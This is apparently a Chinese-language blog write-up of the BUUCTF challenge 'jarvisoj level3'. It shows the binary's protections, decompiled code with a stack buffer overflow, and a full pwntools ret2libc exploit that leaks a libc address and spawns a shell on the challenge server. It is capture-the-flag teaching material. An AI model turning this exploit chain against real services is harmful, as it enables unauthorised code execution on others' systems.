jarvisoj level3

# jarvisoj level3

# 前提

# 查看文件保护

[*] '/root/pwn/buuctf/jarvisoj_level3/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

1
2
3
4
5
6

# 静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  write(1, "Hello, World!\n", 0xEu);
  return 0;
}

1
2
3
4
5
6

vulnerable_function函数如下

ssize_t vulnerable_function()
{
  char buf[136]; // [esp+0h] [ebp-88h] BYREF

  write(1, "Input:\n", 7u);
  return read(0, buf, 0x100u);
}

1
2
3
4
5
6
7

# 思路分析

目前信息：
- vulnerable_function函数可溢出
- 无system、/bin/sh及后门函数
- No PIE
思路：
- 32位ret2libc做法

# exp

from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_level3/level3'
io = remote('node4.buuoj.cn', 28630)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 136+4
libc_start_main_got = elf.got['__libc_start_main']
write_plt = elf.plt['write']
vulnerable_function = elf.symbols['vulnerable_function']
payload = flat(['a'*padding, write_plt, vulnerable_function,1, libc_start_main_got, 4])
io.sendafter('Input:\n', payload)
leak_libc_start_main = u32(io.recvuntil('Input:\n', drop=True))
libc = LibcSearcher('__libc_start_main', leak_libc_start_main)
libc_base = leak_libc_start_main-libc.dump('__libc_start_main')
system = libc_base+libc.dump('system')
bin_sh = libc_base+libc.dump('str_bin_sh')
payload = flat(['a'*padding, system, 0xdeadbeef, bin_sh])
io.send(payload)
io.interactive()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

#buuctf #pwn #StackOverflow

上次更新: 2022/08/15, 00:29:49

← jarvisoj tell me something ez pz hackover 2016→